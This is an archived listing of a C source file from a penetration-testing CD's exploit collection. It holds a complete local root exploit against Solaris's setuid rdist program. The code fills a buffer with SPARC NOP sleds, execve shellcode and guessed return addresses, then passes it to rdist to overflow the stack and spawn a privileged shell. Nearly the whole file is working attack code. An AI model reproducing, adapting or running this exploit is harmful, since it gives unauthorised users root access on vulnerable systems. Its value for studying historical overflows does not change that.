home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / t4.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.6 KB  |  105 lines
  1. /* rdist solaris 2.* sploit */
  2. /* by horizon. thanks to ktwo */
  3. /* argv[1] is your offset */
  4.  
  5. #include <stdio.h>
  6. #include <stdlib.h>
  7. #include <sys/types.h>
  8. #include <unistd.h>
  9.  
  10. #define BUF_LENGTH 1024
  11. #define SAFETY 40 /* blind guess */
  12. #define EXTRA 400
  13. #define STACK_OFFSET 2360
  14. #define SAFETY_OFFSET 248
  15. #define SPARC_NOP 0xac15a16e
  16.  
  17. u_char sparc_shellcode[] =
  18.   "\x90\x08\x3f\xff\x82\x10\x20\x8d\x91\xd0\x20\x08"
  19.   "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
  20.   "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
  21.   "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
  22.   "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  23.   "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
  24.   "\x91\xd0\x20\x08";
  25.  
  26. int addr_ok(long a)
  27. {
  28.   if (((a>>24)&255)==0) return 0;
  29.   if (((a>>16)&255)==0) return 0;
  30.   if (((a>>8)&255)==0) return 0;
  31.   if (((a)&255)==0) return 0;
  32.   return 1;
  33. }
  34.  
  35. u_long get_safe_addr(long sp)
  36. {
  37.   return sp-SAFETY_OFFSET;
  38. }
  39.  
  40. u_long get_sp(void)
  41. {
  42.   __asm__("mov %sp,%i0 \n");
  43. }
  44.  
  45. int main(int argc, char *argv[])
  46. {
  47.   char buf[BUF_LENGTH + EXTRA + 8];
  48.   char tempbuf[BUF_LENGTH + EXTRA + 8+6];
  49.  
  50.   long stack,targ_addr,safe_addr;
  51.  
  52.   u_long *long_p;
  53.   u_char *char_p;
  54.   int i, code_length = strlen(sparc_shellcode),dso=0;
  55.  
  56.   if(argc > 1) dso=atoi(argv[1]);
  57.  
  58.   stack=get_sp();
  59.  
  60.   safe_addr=get_safe_addr(stack);
  61.   while(addr_ok(safe_addr)==0) safe_addr+=8;
  62.  
  63.   targ_addr = stack + STACK_OFFSET - dso;
  64.   while(addr_ok(targ_addr)==0) targ_addr+=8;
  65.  
  66.   long_p =(u_long *) buf ;
  67.   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
  68.     *long_p++ = SPARC_NOP;
  69.  
  70.   char_p = (u_char *) long_p;
  71.  
  72.   for (i = 0; i < code_length; i++)
  73.     *char_p++ = sparc_shellcode[i];
  74.  
  75.   *char_p++=' ';
  76.   *char_p++=' ';
  77.  
  78.   for (i = 0; i < SAFETY /4; i++)
  79.     {
  80.       *char_p++ =(safe_addr>>24)&255;
  81.       *char_p++ =(safe_addr>>16)&255;
  82.       *char_p++ =(safe_addr>>8)&255;
  83.       *char_p++ =(safe_addr)&255;
  84.     }
  85.  
  86.   for (i = 0; i < (EXTRA-SAFETY) /4; i++)
  87.     {
  88.       *char_p++ =(targ_addr>>24)&255;
  89.       *char_p++ =(targ_addr>>16)&255;
  90.       *char_p++ =(targ_addr>>8)&255;
  91.       *char_p++ =(targ_addr)&255;
  92.     }
  93.  
  94.   *char_p++=0;
  95.  
  96.   sprintf(tempbuf,"bleh=%s",&buf[2]);
  97.  
  98.   printf("Stack address: 0x%lx. Safe address: 0x%lx (delta %d).\n",
  99.          stack,safe_addr,stack-safe_addr);
  100.   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
  101.          targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  102.   execl("/bin/rdist","rdist","-d",tempbuf,"-c","/tmp/","${bleh}",(char *) 0);
  103.   perror("execl failed");
  104. }
  105. /*                    www.hack.co.za              [2000]*/